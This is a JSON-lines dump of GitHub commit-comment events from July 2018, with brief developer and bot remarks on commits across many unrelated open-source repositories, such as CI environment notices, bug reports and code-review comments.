{"id":"7996823477","type":"CommitCommentEvent","actor":{"login":"versatran01"},"repo":{"name":"KumarRobotics/camera_base"},"payload":{"comment":{"id":29783727,"position":null,"line":null,"path":null,"commit_id":"d72304898a6412cb77d8dce5597bb5e51a09feb1","created_at":"2018-07-20T19:34:42Z","updated_at":"2018-07-20T19:34:42Z","author_association":"MEMBER","body":"Or you can just work on your own fork, and modify it however you want"}},"created_at":"2018-07-20T19:34:42Z"}
{"id":"7996825465","type":"CommitCommentEvent","actor":{"login":"MutawaPro"},"repo":{"name":"MutawaPro/MutawaPro.github.io."},"payload":{"comment":{"id":29783730,"position":1,"line":1,"path":"CNAME","commit_id":"a1e11874e44e91c492b99edfdeb0183193f50be6","created_at":"2018-07-20T19:35:11Z","updated_at":"2018-07-20T19:35:11Z","author_association":"OWNER","body":"mutawapro.github.io"}},"created_at":"2018-07-20T19:35:11Z"}
{"id":"7996827480","type":"CommitCommentEvent","actor":{"login":"mobeonsa"},"repo":{"name":"mobeonsa/Modpack"},"payload":{"comment":{"id":29783736,"position":null,"line":null,"path":null,"commit_id":"bd620dbd1fcc257f9dec466c3620cedada1bb355","created_at":"2018-07-20T19:35:41Z","updated_at":"2018-07-20T19:35:41Z","author_association":"OWNER","body":"[ ] asdf\r\n[ ] rr"}},"created_at":"2018-07-20T19:35:41Z"}
{"id":"7996832430","type":"CommitCommentEvent","actor":{"login":"Anduh"},"repo":{"name":"Roll20/roll20-character-sheets"},"payload":{"comment":{"id":29783750,"position":null,"line":null,"path":null,"commit_id":"f804af6f216a7d4528db2dfcadf5806cb3eec11a","created_at":"2018-07-20T19:36:56Z","updated_at":"2018-07-20T19:36:56Z","author_association":"CONTRIBUTOR","body":":grin: "}},"created_at":"2018-07-20T19:36:56Z"}
{"id":"7996833235","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29783752,"position":null,"line":null,"path":null,"commit_id":"fbd0867ce46eddc9cb03eb7b47bc67c204e412ba","created_at":"2018-07-20T19:37:10Z","updated_at":"2018-07-20T19:37:10Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-110](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-110).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-110-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-20T19:37:10Z"}
{"id":"7996835758","type":"CommitCommentEvent","actor":{"login":"retry"},"repo":{"name":"flack/quickform"},"payload":{"comment":{"id":29783759,"position":null,"line":null,"path":null,"commit_id":"0a771df44e33c17f18f86b641d202edae4490870","created_at":"2018-07-20T19:37:47Z","updated_at":"2018-07-20T19:37:47Z","author_association":"NONE","body":"Vielen dank."}},"created_at":"2018-07-20T19:37:47Z"}
{"id":"7996835824","type":"CommitCommentEvent","actor":{"login":"ShaiberAlon"},"repo":{"name":"merenlab/web"},"payload":{"comment":{"id":29783760,"position":null,"line":null,"path":null,"commit_id":"532e89814e4918f1d1a1a1e34e6491c1e18952aa","created_at":"2018-07-20T19:37:48Z","updated_at":"2018-07-20T19:37:48Z","author_association":"MEMBER","body":"@jarrodscott, I added this note. Thank you for letting me know."}},"created_at":"2018-07-20T19:37:48Z"}
{"id":"7996836795","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29783762,"position":null,"line":null,"path":null,"commit_id":"d78ee4e46d4d38d4769adf10b3f04f883c4e3634","created_at":"2018-07-20T19:38:03Z","updated_at":"2018-07-20T19:38:03Z","author_association":"COLLABORATOR","body":"da force push auf protected unterbunden, naja, geht halt so auch. \r\nhätte aber auch nen einfaches commit machen können, wollte schummeln und --amend nutzen"}},"created_at":"2018-07-20T19:38:03Z"}
{"id":"7996837928","type":"CommitCommentEvent","actor":{"login":"DonJayamanne"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29783765,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-20T19:38:20Z","updated_at":"2018-07-20T19:38:20Z","author_association":"NONE","body":"Wow, looks super simple. Although I cannot see how or where we differentiate between vs and VSC."}},"created_at":"2018-07-20T19:38:20Z"}
{"id":"7996846486","type":"CommitCommentEvent","actor":{"login":"dasa"},"repo":{"name":"dcodeIO/long.js"},"payload":{"comment":{"id":29783790,"position":null,"line":null,"path":null,"commit_id":"9dec5155003c0c892b33ff11e413158bafc5a8d6","created_at":"2018-07-20T19:40:29Z","updated_at":"2018-07-20T19:40:29Z","author_association":"NONE","body":"`wasm.wast` was renamed to `wasm.wat` at f572e3a17d313730cf11eb838f6d2a5e31626f8a"}},"created_at":"2018-07-20T19:40:29Z"}
{"id":"7996848791","type":"CommitCommentEvent","actor":{"login":"DonJayamanne"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29783799,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-20T19:41:04Z","updated_at":"2018-07-20T19:41:04Z","author_association":"NONE","body":"Next challenge, reverting the original PR."}},"created_at":"2018-07-20T19:41:04Z"}
{"id":"7996851775","type":"CommitCommentEvent","actor":{"login":"jaysingh9518"},"repo":{"name":"jaysingh9518/github-slideshow"},"payload":{"comment":{"id":29783808,"position":null,"line":null,"path":null,"commit_id":"1cad8936a75a4002ea040207aa198769ce63fe36","created_at":"2018-07-20T19:41:42Z","updated_at":"2018-07-20T19:41:42Z","author_association":"OWNER","body":"please add some movement right arroe"}},"created_at":"2018-07-20T19:41:42Z"}
{"id":"7996857177","type":"CommitCommentEvent","actor":{"login":"jaysingh9518"},"repo":{"name":"jaysingh9518/github-slideshow"},"payload":{"comment":{"id":29783821,"position":5,"line":5,"path":"_posts/0000-01-02-jaysingh9518.md","commit_id":"1cad8936a75a4002ea040207aa198769ce63fe36","created_at":"2018-07-20T19:42:53Z","updated_at":"2018-07-20T19:42:53Z","author_association":"OWNER","body":"+Thanks"}},"created_at":"2018-07-20T19:42:53Z"}
{"id":"7996863410","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29783831,"position":null,"line":null,"path":null,"commit_id":"82cb83752cf25f89cbcc3def806b7dadcbb49d59","created_at":"2018-07-20T19:44:19Z","updated_at":"2018-07-20T19:44:19Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.12 |\n| `metadata_passing` |     2    |\n| `metadata_total`   |    -6    |\n| `texts_total`      |    -4    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg002/tlg0035.tlg002.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0086/tlg045/tlg0086.tlg045.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n| `./data/tlg0086/tlg045/__cts__.xml`                     | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4475)*\n"}},"created_at":"2018-07-20T19:44:19Z"}
{"id":"7996864231","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783832,"position":null,"line":null,"path":null,"commit_id":"72d4a43417776ccd4c1c255b8ee8f721a86f92fa","created_at":"2018-07-20T19:44:32Z","updated_at":"2018-07-20T19:44:32Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-865](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-865).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-865-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T19:44:32Z"}
{"id":"7996864503","type":"CommitCommentEvent","actor":{"login":"JustOff"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29783834,"position":null,"line":null,"path":null,"commit_id":"8be0c16be614d54183ee3d4877e2243cb9e468c8","created_at":"2018-07-20T19:44:36Z","updated_at":"2018-07-20T19:44:36Z","author_association":"CONTRIBUTOR","body":"String changes were pushed to CrowdIn."}},"created_at":"2018-07-20T19:44:36Z"}
{"id":"7996865110","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29783838,"position":null,"line":null,"path":null,"commit_id":"e9f48ea8125104ddf3a3b3880f1e7dedb8d43ba6","created_at":"2018-07-20T19:44:46Z","updated_at":"2018-07-20T19:44:46Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4476)*\n"}},"created_at":"2018-07-20T19:44:46Z"}
{"id":"7996867516","type":"CommitCommentEvent","actor":{"login":"MilanPokharna"},"repo":{"name":"MilanPokharna/TestingApp"},"payload":{"comment":{"id":29783844,"position":null,"line":null,"path":null,"commit_id":"3299df1de2cc918d26eded675d922847e80b6cf6","created_at":"2018-07-20T19:45:21Z","updated_at":"2018-07-20T19:45:21Z","author_association":"OWNER","body":"yes revert it"}},"created_at":"2018-07-20T19:45:21Z"}
{"id":"7996868766","type":"CommitCommentEvent","actor":{"login":"esebastian"},"repo":{"name":"VLCTechHub/VLCTechHub-api"},"payload":{"comment":{"id":29783847,"position":13,"line":11,"path":"config/base.rb","commit_id":"bc5a9605f4162c52bb887169b45e58332c7d47f9","created_at":"2018-07-20T19:45:40Z","updated_at":"2018-07-20T19:45:40Z","author_association":"MEMBER","body":"Should we remove this?"}},"created_at":"2018-07-20T19:45:40Z"}
{"id":"7996874267","type":"CommitCommentEvent","actor":{"login":"dilchenko"},"repo":{"name":"elastic/beats"},"payload":{"comment":{"id":29783852,"position":null,"line":null,"path":null,"commit_id":"a44f8041831d230deb908eba4e72311917435a9f","created_at":"2018-07-20T19:46:59Z","updated_at":"2018-07-20T19:46:59Z","author_association":"NONE","body":"Sorry, I meant to document the commit, but instead clicked Ctrl+Enter and GH committed the thing.\r\n\r\nSituation:\r\n2 x 6.3.1 clusters, sending ES monitoring data to another 6.3.1 cluster. Filebeat version 6.2.1 sending data to another 6.2.3 ES cluster. We decide to send filebeat monitoring data to the same monitoring 6.3.1 cluster, it fails like https://discuss.elastic.co/t/no-xpack-monitoring-for-metricbeat/136573 which is due to https://github.com/elastic/beats/pull/6449. We cannot downgrade the monitoring cluster, because then the monitoring data from 2 x 6.3.1 will fail, and because cloud does not support downgrades. So simply to send monitoring data to another cluster, we are forced to upgrade Filebeat across the whole infrastructure.\r\n\r\nThis is very much a breaking change!"}},"created_at":"2018-07-20T19:46:59Z"}
{"id":"7996875002","type":"CommitCommentEvent","actor":{"login":"AlexanderLS"},"repo":{"name":"Vorlonsoft/GradleMavenPush"},"payload":{"comment":{"id":29783853,"position":1,"line":131,"path":"README.md","commit_id":"2afa7d38099de72a9119e0c474c6c77ee220bb88","created_at":"2018-07-20T19:47:11Z","updated_at":"2018-07-20T19:47:11Z","author_association":"MEMBER","body":"LIBff10720, not LIBbb10719"}},"created_at":"2018-07-20T19:47:11Z"}
{"id":"7996875748","type":"CommitCommentEvent","actor":{"login":"Pavo-IM"},"repo":{"name":"acidanthera/WhateverGreen"},"payload":{"comment":{"id":29783856,"position":null,"line":null,"path":null,"commit_id":"50c419d2deac7f043bab34c140cae1b881a606bc","created_at":"2018-07-20T19:47:21Z","updated_at":"2018-07-20T19:47:21Z","author_association":"NONE","body":"Just wanted to let you aware but you have #include <Headers/kern_devinfo.hpp> in a lot of your files but there is no kern_devinfo.hpp file located in the Headers folder in the source.\r\n"}},"created_at":"2018-07-20T19:47:21Z"}
{"id":"7996879089","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"acidanthera/WhateverGreen"},"payload":{"comment":{"id":29783865,"position":null,"line":null,"path":null,"commit_id":"50c419d2deac7f043bab34c140cae1b881a606bc","created_at":"2018-07-20T19:48:15Z","updated_at":"2018-07-20T19:48:15Z","author_association":"COLLABORATOR","body":"That's Lilu SDK. Please download a debug version of Lilu.kext and put it to the project folder."}},"created_at":"2018-07-20T19:48:15Z"}
{"id":"7996884313","type":"CommitCommentEvent","actor":{"login":"Pavo-IM"},"repo":{"name":"acidanthera/WhateverGreen"},"payload":{"comment":{"id":29783868,"position":null,"line":null,"path":null,"commit_id":"50c419d2deac7f043bab34c140cae1b881a606bc","created_at":"2018-07-20T19:49:28Z","updated_at":"2018-07-20T19:49:28Z","author_association":"NONE","body":"Ah ok, got it thanks."}},"created_at":"2018-07-20T19:49:28Z"}
{"id":"7996886338","type":"CommitCommentEvent","actor":{"login":"nataliac06"},"repo":{"name":"ua-eas/ksd-kc5.2.1-rice"},"payload":{"comment":{"id":29783871,"position":null,"line":null,"path":null,"commit_id":"e2405deeee63065648a043647abd2cfe00231c38","created_at":"2018-07-20T19:49:58Z","updated_at":"2018-07-20T19:49:58Z","author_association":"NONE","body":"Looks great!\r\n"}},"created_at":"2018-07-20T19:49:58Z"}
{"id":"7996889168","type":"CommitCommentEvent","actor":{"login":"Pavo-IM"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29783874,"position":null,"line":null,"path":null,"commit_id":"5c48d7aa4bfbbd5dc3ec5cfa6b4822abd0afb45b","created_at":"2018-07-20T19:50:38Z","updated_at":"2018-07-20T19:50:38Z","author_association":"NONE","body":"Any reason you can think of that would make me lose audio when using npci=2000 bootflag?"}},"created_at":"2018-07-20T19:50:38Z"}
{"id":"7996892122","type":"CommitCommentEvent","actor":{"login":"AlexanderLS"},"repo":{"name":"Vorlonsoft/GradleMavenPush"},"payload":{"comment":{"id":29783879,"position":1,"line":263,"path":"maven-push.gradle","commit_id":"2afa7d38099de72a9119e0c474c6c77ee220bb88","created_at":"2018-07-20T19:51:26Z","updated_at":"2018-07-20T19:51:26Z","author_association":"MEMBER","body":"LIBff10720, not LIBbb10719"}},"created_at":"2018-07-20T19:51:26Z"}
{"id":"7996893623","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29783884,"position":null,"line":null,"path":null,"commit_id":"5c48d7aa4bfbbd5dc3ec5cfa6b4822abd0afb45b","created_at":"2018-07-20T19:51:47Z","updated_at":"2018-07-20T19:51:47Z","author_association":"COLLABORATOR","body":"No"}},"created_at":"2018-07-20T19:51:47Z"}
{"id":"7996894854","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783887,"position":null,"line":null,"path":null,"commit_id":"13a2c8af2d537b64961c11b08d1fdbc665a457b6","created_at":"2018-07-20T19:52:06Z","updated_at":"2018-07-20T19:52:06Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-867](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-867).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-867-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T19:52:06Z"}
{"id":"7996897807","type":"CommitCommentEvent","actor":{"login":"rjaquino"},"repo":{"name":"Asana/export_importer"},"payload":{"comment":{"id":29783892,"position":12,"line":25,"path":"lib/asana_export/AsanaExport.js","commit_id":"80cfdb1a09c52e19ea712d05cd49dac45db710f2","created_at":"2018-07-20T19:52:49Z","updated_at":"2018-07-20T19:52:49Z","author_association":"CONTRIBUTOR","body":"this only replaces the first instance. I think we need to do\r\n`.replace(new RegExp(\">\", 'g'),\"&gt;\");`\r\n\r\nBut I'm not 100% sure.\r\n"}},"created_at":"2018-07-20T19:52:49Z"}
{"id":"7996900006","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29783896,"position":5,"line":260,"path":"src/lib/retrieve/cache.rs","commit_id":"9649d4ad5d1be95d9f4f79bfda8c88b33ecbeb1e","created_at":"2018-07-20T19:53:21Z","updated_at":"2018-07-20T19:53:21Z","author_association":"CONTRIBUTOR","body":"No need I guess; no one should write to a source cache, which have hash in the name of folder."}},"created_at":"2018-07-20T19:53:21Z"}
{"id":"7996904048","type":"CommitCommentEvent","actor":{"login":"maudrico"},"repo":{"name":"maudrico/robustus"},"payload":{"comment":{"id":29783902,"position":null,"line":null,"path":null,"commit_id":"f63932461bf75495437da376a774721b7d2b5e55","created_at":"2018-07-20T19:54:21Z","updated_at":"2018-07-20T19:54:21Z","author_association":"OWNER","body":"zc"}},"created_at":"2018-07-20T19:54:21Z"}
{"id":"7996906106","type":"CommitCommentEvent","actor":{"login":"tehesuleng19"},"repo":{"name":"tehesuleng19/Masha"},"payload":{"comment":{"id":29783910,"position":null,"line":null,"path":null,"commit_id":"f8aa2d3db0910e4c5579b5115c160f8ff48d7b0a","created_at":"2018-07-20T19:54:53Z","updated_at":"2018-07-20T19:54:53Z","author_association":"OWNER","body":","}},"created_at":"2018-07-20T19:54:53Z"}
{"id":"7996907262","type":"CommitCommentEvent","actor":{"login":"tehesuleng19"},"repo":{"name":"tehesuleng19/Masha"},"payload":{"comment":{"id":29783914,"position":null,"line":null,"path":null,"commit_id":"f8aa2d3db0910e4c5579b5115c160f8ff48d7b0a","created_at":"2018-07-20T19:55:09Z","updated_at":"2018-07-20T19:55:09Z","author_association":"OWNER","body":"Help"}},"created_at":"2018-07-20T19:55:09Z"}
{"id":"7996907422","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29783915,"position":null,"line":null,"path":null,"commit_id":"f10c053338b689a3fea0f1b00d438ef7a7e4f113","created_at":"2018-07-20T19:55:11Z","updated_at":"2018-07-20T19:55:11Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-240](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-240).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-240-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T19:55:11Z"}
{"id":"7996907856","type":"CommitCommentEvent","actor":{"login":"qwIvan"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29783918,"position":null,"line":null,"path":null,"commit_id":"ac75a041048b8c1f7418e27621ca5efda8571043","created_at":"2018-07-20T19:55:18Z","updated_at":"2018-07-20T19:55:18Z","author_association":"NONE","body":"issue from line 475:\r\n\r\nhttps://github.com/torvalds/linux/blob/ac75a041048b8c1f7418e27621ca5efda8571043/drivers/hid/i2c-hid/i2c-hid.c#L475"}},"created_at":"2018-07-20T19:55:18Z"}
{"id":"7996909343","type":"CommitCommentEvent","actor":{"login":"Pavo-IM"},"repo":{"name":"acidanthera/AppleALC"},"payload":{"comment":{"id":29783922,"position":null,"line":null,"path":null,"commit_id":"5c48d7aa4bfbbd5dc3ec5cfa6b4822abd0afb45b","created_at":"2018-07-20T19:55:40Z","updated_at":"2018-07-20T19:55:40Z","author_association":"NONE","body":"Anything you need from me to try and figure it out? Maybe something can be added to AppleALC that would all users that normally have to use npci=2000 bootflag in order to get audio working wouldn't need it anymore."}},"created_at":"2018-07-20T19:55:40Z"}
{"id":"7996910150","type":"CommitCommentEvent","actor":{"login":"carl-mastrangelo"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29783925,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-20T19:55:52Z","updated_at":"2018-07-20T19:55:52Z","author_association":"MEMBER","body":"@LIULi-VVET We don't support modifying the generated code manually, can you give more detail about what you are trying to do?"}},"created_at":"2018-07-20T19:55:52Z"}
{"id":"7996911490","type":"CommitCommentEvent","actor":{"login":"tehesuleng19"},"repo":{"name":"tehesuleng19/Masha"},"payload":{"comment":{"id":29783930,"position":null,"line":null,"path":null,"commit_id":"f8aa2d3db0910e4c5579b5115c160f8ff48d7b0a","created_at":"2018-07-20T19:56:09Z","updated_at":"2018-07-20T19:56:09Z","author_association":"OWNER","body":"`Help`"}},"created_at":"2018-07-20T19:56:09Z"}
{"id":"7996913479","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29783935,"position":null,"line":null,"path":null,"commit_id":"589c5b4e8dc4fab625868672d138e46290b19ecf","created_at":"2018-07-20T19:56:35Z","updated_at":"2018-07-20T19:56:35Z","author_association":"NONE","body":"I think this commit casues combined with 5dfa4ded43cb51d1325bf8cd904e345c1a43ec15 causes\r\n```\r\n==> Verifying git-2.18.0.tar.xz checksum\r\nError: super: no superclass method `extract_to_dir' for #<XzUnpackStrategy:0x013a1c94>\r\n/usr/local/Homebrew/Library/Homebrew/unpack_strategy.rb:202:in `extract_to_dir'\r\n/usr/local/Homebrew/Library/Homebrew/unpack_strategy.rb:68:in `extract'\r\n/usr/local/Homebrew/Library/Homebrew/unpack_strategy.rb:75:in `block in extract_nestedly'\r\n/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/2.3.7/lib/ruby/2.3.0/tmpdir.rb:89:in `mktmpdir'\r\n/usr/local/Homebrew/Library/Homebrew/unpack_strategy.rb:72:in `extract_nestedly'\r\n/usr/local/Homebrew/Library/Homebrew/download_strategy.rb:51:in `stage'\r\n/usr/local/Homebrew/Library/Homebrew/download_strategy.rb:172:in `stage'\r\n/usr/local/Homebrew/Library/Homebrew/resource.rb:116:in `block in unpack'\r\n/usr/local/Homebrew/Library/Homebrew/resource.rb:189:in `block in mktemp'\r\n/usr/local/Homebrew/Library/Homebrew/mktemp.rb:55:in `block in run'\r\n/usr/local/Homebrew/Library/Homebrew/mktemp.rb:55:in `chdir'\r\n/usr/local/Homebrew/Library/Homebrew/mktemp.rb:55:in `run'\r\n/usr/local/Homebrew/Library/Homebrew/resource.rb:188:in `mktemp'\r\n/usr/local/Homebrew/Library/Homebrew/resource.rb:115:in `unpack'\r\n/usr/local/Homebrew/Library/Homebrew/resource.rb:93:in `stage'\r\n/usr/local/Homebrew/Library/Homebrew/vendor/portable-ruby/2.3.7/lib/ruby/2.3.0/forwardable.rb:202:in `stage'\r\n/usr/local/Homebrew/Library/Homebrew/formula.rb:2014:in `stage'\r\n/usr/local/Homebrew/Library/Homebrew/formula.rb:1112:in `brew'\r\n/usr/local/Homebrew/Library/Homebrew/build.rb:113:in `block in install'\r\n/usr/local/Homebrew/Library/Homebrew/utils.rb:564:in `with_env'\r\n/usr/local/Homebrew/Library/Homebrew/build.rb:110:in `install'\r\n/usr/local/Homebrew/Library/Homebrew/build.rb:191:in `<main>'\r\n```"}},"created_at":"2018-07-20T19:56:35Z"}
{"id":"7996915741","type":"CommitCommentEvent","actor":{"login":"manjilgautam"},"repo":{"name":"ricglz0201/Team7Repo"},"payload":{"comment":{"id":29783944,"position":4,"line":204,"path":"src/main/java/codeu/model/store/persistence/PersistentDataStore.java","commit_id":"8cd65942750ea00b0a3869c178ff00960fb28e34","created_at":"2018-07-20T19:57:07Z","updated_at":"2018-07-20T19:57:07Z","author_association":"COLLABORATOR","body":"The reason why i used this is, once results is empty it prints the error message. Isn't that what we want? Also, i was thinking since Google datastore is \"No Sql\" document datastore, won't app engine automatically identify if we are missing something. "}},"created_at":"2018-07-20T19:57:07Z"}
{"id":"7996916911","type":"CommitCommentEvent","actor":{"login":"andylokandy"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29783948,"position":4,"line":259,"path":"src/lib/retrieve/cache.rs","commit_id":"9649d4ad5d1be95d9f4f79bfda8c88b33ecbeb1e","created_at":"2018-07-20T19:57:22Z","updated_at":"2018-07-20T19:57:22Z","author_association":"CONTRIBUTOR","body":"AFAICS, direct resolution and manifest is not needed in the whole lifetime of Source; a Summary is sufficient."}},"created_at":"2018-07-20T19:57:22Z"}
{"id":"7996917213","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29783949,"position":null,"line":null,"path":null,"commit_id":"26944dae1f027787f712cdd3921cfbb029551d0a","created_at":"2018-07-20T19:57:26Z","updated_at":"2018-07-20T19:57:26Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-869](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-869).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-869-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T19:57:26Z"}
{"id":"7996921770","type":"CommitCommentEvent","actor":{"login":"tehesuleng19"},"repo":{"name":"tehesuleng19/Masha"},"payload":{"comment":{"id":29783958,"position":null,"line":null,"path":null,"commit_id":"f8aa2d3db0910e4c5579b5115c160f8ff48d7b0a","created_at":"2018-07-20T19:58:31Z","updated_at":"2018-07-20T19:58:31Z","author_association":"OWNER","body":"@─═ইஓ﷽⭐Suleng⭐﷽‮─═ইஓ"}},"created_at":"2018-07-20T19:58:31Z"}
{"id":"7996926325","type":"CommitCommentEvent","actor":{"login":"CreeD-9"},"repo":{"name":"CreeD-9/fl-9"},"payload":{"comment":{"id":29783968,"position":null,"line":null,"path":null,"commit_id":"d8a305dd2b790fe7b594b76efc174f8d75351c23","created_at":"2018-07-20T19:59:36Z","updated_at":"2018-07-20T19:59:36Z","author_association":"OWNER","body":"Repository fl-9 for Epam University"}},"created_at":"2018-07-20T19:59:36Z"}
{"id":"7996926581","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29783971,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-20T19:59:40Z","updated_at":"2018-07-20T19:59:40Z","author_association":"COLLABORATOR","body":"The axes in `antgrid = numpy.zeros((1,2,GRID_SIZE**2,nstand*npol), dtype=numpy.complex64)` are:\r\n  1) dummy axis to make `matmul()` happy, \r\n  2) the polarization axis for the gridding kernels, \r\n  3) the gridding kernels themselves as a 1-D array, and\r\n  4) the standpols to be gridded.."}},"created_at":"2018-07-20T19:59:40Z"}
{"id":"7992519337","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/azure-storage-blob-feedstock"},"payload":{"comment":{"id":29773126,"position":null,"line":null,"path":null,"commit_id":"76ff0acf4f493267da5b52d94f89e20258636908","created_at":"2018-07-20T02:00:18Z","updated_at":"2018-07-20T02:00:18Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xhochy were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T02:00:18Z"}
{"id":"7992519656","type":"CommitCommentEvent","actor":{"login":"diraol"},"repo":{"name":"ask-ar/carceropolis"},"payload":{"comment":{"id":29773128,"position":4,"line":13,"path":"carceropolis/carceropolis/templates/pages/menus/footer.html","commit_id":"0f67c94333a6270908b674ee746124986a292122","created_at":"2018-07-20T02:00:25Z","updated_at":"2018-07-20T02:00:25Z","author_association":"MEMBER","body":"@vanessametonini a imagem sumiu do rodapé aqui.... e o texto quebrou..."}},"created_at":"2018-07-20T02:00:25Z"}
{"id":"7992521587","type":"CommitCommentEvent","actor":{"login":"JyeSmith"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29773133,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-20T02:01:07Z","updated_at":"2018-07-20T02:01:07Z","author_association":"OWNER","body":"I cannot see why not, the Arduino code ports over and there appear to be a TVout lib available.\r\n\r\nIs there any reason to do this?"}},"created_at":"2018-07-20T02:01:07Z"}
